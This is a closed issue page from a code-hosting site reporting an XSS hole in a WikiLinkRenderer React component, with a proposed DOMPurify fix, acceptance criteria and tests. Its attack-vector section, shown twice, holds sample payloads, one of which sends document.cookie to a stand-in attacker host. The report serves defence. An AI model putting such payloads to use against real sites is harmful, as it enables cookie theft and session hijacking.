[CRITICAL] Fix XSS vulnerability in WikiLinkRenderer #191

New Issue

Closed

opened 2026-02-02 17:25:15 +00:00 by jason.woltje · 0 comments

jason.woltje commented 2026-02-02 17:25:15 +00:00

Owner

Copy Link

Problem

WikiLinkRenderer uses dangerouslySetInnerHTML on arbitrary HTML with only wiki-link text escaped. If knowledge entry HTML is user-generated and not sanitized server-side, this is a direct XSS vulnerability.

Location

apps/web/components/WikiLinkRenderer.tsx

• Line 33: dangerouslySetInnerHTML with user HTML
• Line 36: Only wiki-link text escaped, rest untrusted

<div
  dangerouslySetInnerHTML={{ __html: html }}  // ❌ Arbitrary HTML injection
  onClick={handleWikiLinkClick}
/>

Attack Vector

If knowledge entries contain user HTML:

<p>Normal text</p>
<img src=x onerror="alert(document.cookie)">
<script>fetch('https://attacker.com?c='+document.cookie)</script>

Impact

• CRITICAL: Full XSS if HTML is user-controlled
• Session hijacking
• Account takeover
• Data exfiltration
• Blocks production deployment

Questions (URGENT - Need Answers)

1. Is knowledge entry HTML sanitized server-side?
2. Can users create/edit knowledge entries?
3. Is HTML validated before storage?

Acceptance Criteria

• Confirm server-side HTML sanitization exists
• Add client-side DOMPurify sanitization as defense-in-depth
• Use allowlist of safe HTML tags
• Remove dangerouslySetInnerHTML if possible
• Add CSP headers
• Add tests for XSS payloads
• Audit all knowledge entry creation paths

Implementation

Option 1: Server-side only (preferred)

// Server sanitizes before storage
// Client trusts sanitized HTML
<div dangerouslySetInnerHTML={{ __html: sanitizedHtml }} />

Option 2: Defense-in-depth

import DOMPurify from 'dompurify';

const sanitized = DOMPurify.sanitize(html, {
  ALLOWED_TAGS: ['p', 'a', 'strong', 'em', 'ul', 'ol', 'li'],
  ALLOWED_ATTR: ['href', 'class'],
  FORBID_TAGS: ['script', 'iframe', 'object'],
  FORBID_ATTR: ['onerror', 'onload', 'onclick']
});

<div dangerouslySetInnerHTML={{ __html: sanitized }} />

Testing

• Test script tag injection blocked
• Test onerror attribute blocked
• Test legitimate markup preserved
• Verify wiki links still work

References

External security review findings (2026-02-02)

## Problem WikiLinkRenderer uses dangerouslySetInnerHTML on arbitrary HTML with only wiki-link text escaped. If knowledge entry HTML is user-generated and not sanitized server-side, this is a direct XSS vulnerability. ## Location apps/web/components/WikiLinkRenderer.tsx - Line 33: dangerouslySetInnerHTML with user HTML - Line 36: Only wiki-link text escaped, rest untrusted ```typescript <div dangerouslySetInnerHTML={{ __html: html }} // ❌ Arbitrary HTML injection onClick={handleWikiLinkClick} /> ``` ## Attack Vector If knowledge entries contain user HTML: ```html <p>Normal text</p> <img src=x onerror="alert(document.cookie)"> <script>fetch('https://attacker.com?c='+document.cookie)</script> ``` ## Impact - **CRITICAL**: Full XSS if HTML is user-controlled - Session hijacking - Account takeover - Data exfiltration - Blocks production deployment ## Questions (URGENT - Need Answers) 1. Is knowledge entry HTML sanitized server-side? 2. Can users create/edit knowledge entries? 3. Is HTML validated before storage? ## Acceptance Criteria - [ ] Confirm server-side HTML sanitization exists - [ ] Add client-side DOMPurify sanitization as defense-in-depth - [ ] Use allowlist of safe HTML tags - [ ] Remove dangerouslySetInnerHTML if possible - [ ] Add CSP headers - [ ] Add tests for XSS payloads - [ ] Audit all knowledge entry creation paths ## Implementation ### Option 1: Server-side only (preferred) ```typescript // Server sanitizes before storage // Client trusts sanitized HTML <div dangerouslySetInnerHTML={{ __html: sanitizedHtml }} /> ``` ### Option 2: Defense-in-depth ```typescript import DOMPurify from 'dompurify'; const sanitized = DOMPurify.sanitize(html, { ALLOWED_TAGS: ['p', 'a', 'strong', 'em', 'ul', 'ol', 'li'], ALLOWED_ATTR: ['href', 'class'], FORBID_TAGS: ['script', 'iframe', 'object'], FORBID_ATTR: ['onerror', 'onload', 'onclick'] }); <div dangerouslySetInnerHTML={{ __html: sanitized }} /> ``` ## Testing - [ ] Test script tag injection blocked - [ ] Test onerror attribute blocked - [ ] Test legitimate markup preserved - [ ] Verify wiki links still work ## References External security review findings (2026-02-02)

jason.woltje added this to the M4.2-Infrastructure (0.0.4) milestone 2026-02-02 17:25:15 +00:00

jason.woltje added the securitywebp0 labels 2026-02-02 17:25:15 +00:00

jason.woltje closed this issue 2026-02-02 18:05:40 +00:00

jason.woltje referenced this issue 2026-02-02 18:08:07 +00:00

Enhance WikiLink XSS protection with comprehensive validation #201

jason.woltje referenced this issue from a commit 2026-02-02 19:00:53 +00:00

fix(#190,#191): fix XSS vulnerabilities in Mermaid and WikiLink rendering

Sign in to join this conversation.

No Branch/Tag Specified

Branches Tags

main

fix/ci-glibc-image

fix/dockerfile-npmrc

fix/matrix-native-binary

fix/kaniko-cache

fix/base-image-kaniko-v2

fix/base-image-kaniko

feat/custom-base-image

ci/pnpm-cache

fix/interceptor-tests

fix/kanban-tests

feat/wire-chat

feat/usage-widget

fix/security-hardening

fix/project-domain-v2

feat/kanban-add-task

fix/project-domain-attach

fix/logs-page-clean

fix/workspace-members

fix/ci-lint-632

fix/file-manager-tags

fix/csrf-debug-log

fix/controller-type-imports

fix/system-admin-env

fix/gateway-cors-trusted-origins

feat/project-detail-page

fix/fleet-provider-form-dto-v2

fix/ms22-audit

fix/orchestrator-widgets

fix/fleet-provider-form-dto

fix/csrf-bearer-bypass

fix/ms22-missing-authmodule-imports

fix/container-lifecycle-config-module

fix/swarm-compose-ms22-vars

chore/ms22-p1-complete

feat/ms22-p1h-settings-ui

feat/ms22-p1f-onboarding-ui

feat/ms22-p1i-chat-proxy

feat/ms22-p1k-idle-reaper

feat/ms22-p1j-docker

feat/ms22-p1e-onboarding-api

feat/ms22-p1g-settings-api

feat/ms22-p1d-container-mgr

feat/ms22-p1c-config-api

chore/ms22-prd-tracking

feat/ms22-p1a-schema

feat/ms22-p1b-crypto

chore/ms22-p1-tasks

docs/ms22-architecture

feat/ms22-openclaw-docker

feat/ms22-openclaw-gateway-module

chore/ms21-complete

chore/ms21-final-tasks-done

fix/ms21-ui-001-qa

test/ms21-ui-tests

chore/ms21-tasks-sync

chore/ms22-phase0-complete

feat/ms22-ingest-clean

feat/ms21-ui-users-members

feat/ms22-task-agent

chore/tasks-final

chore/tasks-update

feat/ms21-session-invalidation

feat/ms21-rbac-settings

feat/ms21-teams-page

feat/ms21-users-page

feat/ms19-terminal-persistence

v0.0.21

v0.20.0

v0.0.15

v0.0.2

Labels

Clear labels

ai

AI/LLM integration

api

Backend/API work

api

auth

Authentication

database

database

Database/schema work

devops

Docker/deployment

docs

Documentation

frontend

graph

knowledge-module

migration

Data migration

orchestrator

Orchestrator service (apps/orchestrator/)

p0

Critical priority

p1

High priority

p2

Medium priority

p3

Low priority

performance

Performance work

phase-1

phase-2

phase-3

phase-4

phase-5

plugin

MoltBot plugin work

search

security

Security-related

setup

Initial setup

testing

Testing/QA

web

Frontend work

No Label p0 security web

Milestone

No items

No Milestone M4.2-Infrastructure (0.0.4)

Projects

Clear projects

No project

Assignees

Clear assignees

jason.woltje

No Assignees

1 Participants

Notifications

Subscribe

Due Date

No due date set.

Dependencies

No dependencies set.

Reference: mosaic/stack#191